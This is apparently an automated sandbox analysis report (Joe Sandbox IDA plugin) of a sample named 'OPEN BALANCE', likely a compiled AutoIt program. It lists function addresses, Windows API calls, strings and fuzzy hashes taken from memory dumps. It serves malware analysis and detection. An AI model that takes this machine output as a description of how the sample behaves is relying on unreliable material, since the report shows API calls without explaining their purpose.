Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 495e8f62849767e317694afe24e54f24ed4a51a909630b9af80d444688ff2750
Instruction ID: 050d9d36c7b3b95d5aa21a234fc6cdb727357944f5383f6a57897cb6efb03847
Opcode Fuzzy Hash: 495e8f62849767e317694afe24e54f24ed4a51a909630b9af80d444688ff2750
Instruction Fuzzy Hash: 21415D75A0120AEFDB14CF64E844ADA7BB6FF49350F14022AF946D7360D730AA10CF55

Function 008D3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 008D3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 008D3AA0
GetWindowLongW.USER32(?,000000F0), ref: 008D3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008D3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 008D3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 008D3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 008D3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 008D3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 008D3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 008D3C13

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 1f67d5c59dca9bb3f192b8dba429ded57070cf76587f7add92c0c00e797aaffd
Instruction ID: faf0c670bc959bf80dc60981b616d7e31dcb6feb6db338a78425298ac8bd5ee3
Opcode Fuzzy Hash: 1f67d5c59dca9bb3f192b8dba429ded57070cf76587f7add92c0c00e797aaffd
Instruction Fuzzy Hash: FF616775A00208AFDB11DFA8CC81EEE77B8FB09714F10429AFA15E73A1D770AA41DB51

Function 008AB12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 008AB151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,008AA1E1,?,00000001), ref: 008AB165
GetWindowThreadProcessId.USER32(00000000), ref: 008AB16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008AA1E1,?,00000001), ref: 008AB17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 008AB18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008AA1E1,?,00000001), ref: 008AB1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008AA1E1,?,00000001), ref: 008AB1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008AA1E1,?,00000001), ref: 008AB1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008AA1E1,?,00000001), ref: 008AB212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008AA1E1,?,00000001), ref: 008AB21D

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 680726f49fb2ed49cc779050cf9d318d728fc2dd7961a0e40b0089118d4e18f3
Instruction ID: adba5d89f543e4c83764e0f78a3de1c737ef59f70cd39f627ed7701db9e718e5
Opcode Fuzzy Hash: 680726f49fb2ed49cc779050cf9d318d728fc2dd7961a0e40b0089118d4e18f3
Instruction Fuzzy Hash: A431CAB1614204BFEB109F64EC48BAE7BB9FB6A391F10C10AFA01D6591D7B49E00CF60

Function 00872C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00872C94

Part of subcall function 008729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000), ref: 008729DE
Part of subcall function 008729C8: GetLastError.KERNEL32(00000000,?,0087D7D1,00000000,00000000,00000000,00000000,?,0087D7F8,00000000,00000007,00000000,?,0087DBF5,00000000,00000000), ref: 008729F0

_free.LIBCMT ref: 00872CA0
_free.LIBCMT ref: 00872CAB
_free.LIBCMT ref: 00872CB6
_free.LIBCMT ref: 00872CC1
_free.LIBCMT ref: 00872CCC
_free.LIBCMT ref: 00872CD7
_free.LIBCMT ref: 00872CE2
_free.LIBCMT ref: 00872CED
_free.LIBCMT ref: 00872CFB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cfda6540b0ee83bd137e8d19446c1050a0302bcb4392d3b8a864237ab2cc2905
Instruction ID: 0c45bff4b7dada50b2efb0301225feb353b5827db597665632d0c9b7bb4db4d7
Opcode Fuzzy Hash: cfda6540b0ee83bd137e8d19446c1050a0302bcb4392d3b8a864237ab2cc2905
Instruction Fuzzy Hash: EE119676100108AFCB02EF68D842EDD7FA5FF05350F4584A5FA4C9B226D631EA909B91

Function 00841410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00841459
OleUninitialize.OLE32(?,00000000), ref: 008414F8
UnregisterHotKey.USER32(?), ref: 008416DD
DestroyWindow.USER32(?), ref: 008824B9
FreeLibrary.KERNEL32(?), ref: 0088251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0088254B

Strings

close all, xrefs: 00841454

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 28c3328376fb974f3c732a6af70dbc910f878d228a7ae9e074227eabda2840c1
Instruction ID: f7bf3d1617f5a1dd4cdb5aec78c8a1ebbe956913cc6e5e4164443baeef191320
Opcode Fuzzy Hash: 28c3328376fb974f3c732a6af70dbc910f878d228a7ae9e074227eabda2840c1
Instruction Fuzzy Hash: 00D16731702216CFCB29EF18C899A29F7A0FF05710F1542ADE94AEB252DB30AD56CF55

Function 00845BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00845C7A

Part of subcall function 00845D0A: GetClientRect.USER32(?,?), ref: 00845D30
Part of subcall function 00845D0A: GetWindowRect.USER32(?,?), ref: 00845D71
Part of subcall function 00845D0A: ScreenToClient.USER32(?,?), ref: 00845D99

GetDC.USER32 ref: 008846F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00884708
SelectObject.GDI32(00000000,00000000), ref: 00884716
SelectObject.GDI32(00000000,00000000), ref: 0088472B
ReleaseDC.USER32(?,00000000), ref: 00884733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008847C4

Strings

U, xrefs: 00884693

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 5f6ce1b118d5df340b5827cc3842552ee1fa8b1ee36f58f4550c879d9ab1ee51
Instruction ID: 4623999427e862117658fd9204afacecf151039baa85cac56ab99ad2a0ab5c60
Opcode Fuzzy Hash: 5f6ce1b118d5df340b5827cc3842552ee1fa8b1ee36f58f4550c879d9ab1ee51
Instruction Fuzzy Hash: D371FE3250020EDFCF21EF68C984ABA7BB1FF5A324F14526AE951DA2A6D7319841DF50

Function 0087AF88 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0087AFAB

Strings

log10, xrefs: 0087AFF5, 0087B045
asin, xrefs: 0087B117
sqrt, xrefs: 0087B12F
exp, xrefs: 0087B070, 0087B0D2
acos, xrefs: 0087B123
log, xrefs: 0087B051, 0087B05D
pow, xrefs: 0087B08F, 0087B13B, 0087B14E

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: d0a8246bcf415e9c5899acde0ffd6c28e7da57ddf31bbc98f390a4e383d18fef
Instruction ID: 94f199e0ca9881e08a631187698f1ac680bdf5fedc990b2ab71ad784250f519e
Opcode Fuzzy Hash: d0a8246bcf415e9c5899acde0ffd6c28e7da57ddf31bbc98f390a4e383d18fef
Instruction Fuzzy Hash: 1E519C7090054EDBCF14CFA8E9582ADBBB5FF49304F608195E589E7268CB71CD28DB29

Function 008B359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008B35E4

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

LoadStringW.USER32(00912390,?,00000FFF,?), ref: 008B360A

Strings

"%s" (%d) : ==> %s:, xrefs: 008B3742
Error: , xrefs: 008B36EF
Line %d (File "%s"):, xrefs: 008B366B
"%s" (%d) : ==> %s:%s%s, xrefs: 008B3724
^ ERROR, xrefs: 008B36C9

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 406e9eb070e7bbf566ce221442dd2a4598f7556c0d7d380500b3f9c00516e07f
Instruction ID: d1a4458fbd6f6d18263d2a13afeb69632963d8cea696b6a3f45afcddfcfe9e0f
Opcode Fuzzy Hash: 406e9eb070e7bbf566ce221442dd2a4598f7556c0d7d380500b3f9c00516e07f
Instruction Fuzzy Hash: 8C515F7190020DBADF14EBA4DC42EEEBB78FF15310F144125F515B22A2EB312B99DB62

Function 008BC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 008BC272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008BC29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 008BC2CA
GetLastError.KERNEL32 ref: 008BC322
SetEvent.KERNEL32(?), ref: 008BC336
InternetCloseHandle.WININET(00000000), ref: 008BC341

Strings

, xrefs: 008BC2BB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 9b1a04a4ca0c6d48c0bf08c1bb1cfb5928a4a48325ab9dc0b185aac9dfd87038
Instruction ID: 842af0433118b69f16bd8d7098184e1daa522a52e30107a3df2ce5eaa18fea7c
Opcode Fuzzy Hash: 9b1a04a4ca0c6d48c0bf08c1bb1cfb5928a4a48325ab9dc0b185aac9dfd87038
Instruction Fuzzy Hash: 96317AB1601609AFD7219FA98C88AEB7BFCFB49744F54861EF486D2300DB34DD049BA1

Function 008A989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00883AAF,?,?,Bad directive syntax error,008DCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008A98BC
LoadStringW.USER32(00000000,?,00883AAF,?), ref: 008A98C3

Part of subcall function 00849CB3: _wcslen.LIBCMT ref: 00849CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 008A9987

Strings

%s (%d) : ==> %s.: %s %s, xrefs: 008A98F1
Line %d (File "%s"):, xrefs: 008A992D
Error: , xrefs: 008A9955
., xrefs: 008A996D
Line %d:, xrefs: 008A9912

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 638edba6e76c7143bc8bdecebcee458a0d40c1c0d0ff8c9e59515f56909a4dfc
Instruction ID: 5adbb07bd21a4994532b2c990d0d4216f3f0f63320df271e4490fb5f79a2e127
Opcode Fuzzy Hash: 638edba6e76c7143bc8bdecebcee458a0d40c1c0d0ff8c9e59515f56909a4dfc
Instruction Fuzzy Hash: A521803280421EFBDF15AF94DC0AEEE7779FF18304F04446AF515A60A2EB319628DB52

Function 008A209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 008A20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 008A20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 008A214D

Strings

largeicons, xrefs: 008A20E1
SHELLDLL_DefView, xrefs: 008A20CC
list, xrefs: 008A212F
smallicons, xrefs: 008A2115
details, xrefs: 008A20FB

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: a3f94a916fea126180c963b89f071d0e21230440d9e2b943b1732059b02fe767
Instruction ID: 7b5fe0b14cc5b0d5c67aff91d0716e14b1fe3473f9bbf0ca63793b01aaa55de0
Opcode Fuzzy Hash: a3f94a916fea126180c963b89f071d0e21230440d9e2b943b1732059b02fe767
Instruction Fuzzy Hash: 69115C76284707B9FA21222CEC07DAB379CFF16328F21111AF704E44D1FE61BC415A14

Function 008C3C30 Relevance: 13.8, APIs: 9, Instructions: 344COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008C3C5C
CoInitialize.OLE32(00000000), ref: 008C3C8A
_wcslen.LIBCMT ref: 008C3D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 008C3DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 008C3ED5
CoGetObject.OLE32(?,00000000,008DFB98,?), ref: 008C3F2D
SetErrorMode.KERNEL32(00000000), ref: 008C3F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008C3FC4
VariantClear.OLEAUT32(?), ref: 008C3FD8

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable_wcslen
String ID:
API String ID: 216056687-0
Opcode ID: 9f4fdc83cf9f93c5b4ad942e30839d34cbcf28af8dc1adb15af69cf362d6368f
Instruction ID: 6c5ee310907c348bc61386d063b6547c3dc7bd980a22c5b572da453e361b5d62
Opcode Fuzzy Hash: 9f4fdc83cf9f93c5b4ad942e30839d34cbcf28af8dc1adb15af69cf362d6368f
Instruction Fuzzy Hash: 46C1F2716082059F9710DF68C884E2AB7F9FF89748F10891DF98ADB251DB31ED06CB52

Function 0087CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0087CEB7
_free.LIBCMT ref: 0087CF22
_free.LIBCMT ref: 0087CF48
_free.LIBCMT ref: 0087CF71
_free.LIBCMT ref: 0087CFA9
_free.LIBCMT ref: 0087CFDA
_free.LIBCMT ref: 0087D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0087D09C
_free.LIBCMT ref: 0087D0B5

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: b20ed7ce64c943728ef23224f5957c95f1ec900ccfea6998bc52621d6438e704
Instruction ID: 8fd864c7a5b5ca430a621bcb43a3c2693b17a17aaa978b7556d19237c47e7953
Opcode Fuzzy Hash: b20ed7ce64c943728ef23224f5957c95f1ec900ccfea6998bc52621d6438e704
Instruction Fuzzy Hash: 15610771A047046BDB21AFB8A881BA97BA5FF05310F04C16EF94CD728ADBB2D941D751

Function 00858BCD Relevance: 13.7, APIs: 9, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00858F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00858BE8,?,00000000,?,?,?,?,00858BBA,00000000,?), ref: 00858FC5

DestroyWindow.USER32(?), ref: 00858C81
KillTimer.USER32(00000000,?,?,?,?,00858BBA,00000000,?), ref: 00858D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00896973
DeleteObject.GDI32(00000000), ref: 008969E6

Memory Dump Source

Source File: 00000000.00000002.2060637934.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true

Associated: 00000000.00000002.2060615424.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.0000000000902000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060637934.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060827359.0000000000984000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060851785.0000000000985000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_840000_OPEN BALANCE.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: 5ed40156059299695e61f72eb86decc283b4ecf3a6338c90becdd1a226e8461a
Instruction ID: 1d3b0a9da62012b80297bbce1a4e00b5479a1948601c5b37710bf63bda90c7d7
Opcode Fuzzy Hash: 5ed40156059299695e61f72eb86decc283b4ecf3a6338c90becdd1a226e8461a
Instruction Fuzzy Hash: B161AA30216615EFCF25AF18D948B6977F1FB40327F14861AE543EA560CB31AC98DB90

Function 00858B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00896890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008968A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008968B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008968D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008968F2
DestroyCursor.USER32(00000000), ref: 00896901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0089691E
DestroyCursor.USER32(00000000), ref: 0089692D

Memory Dump Source

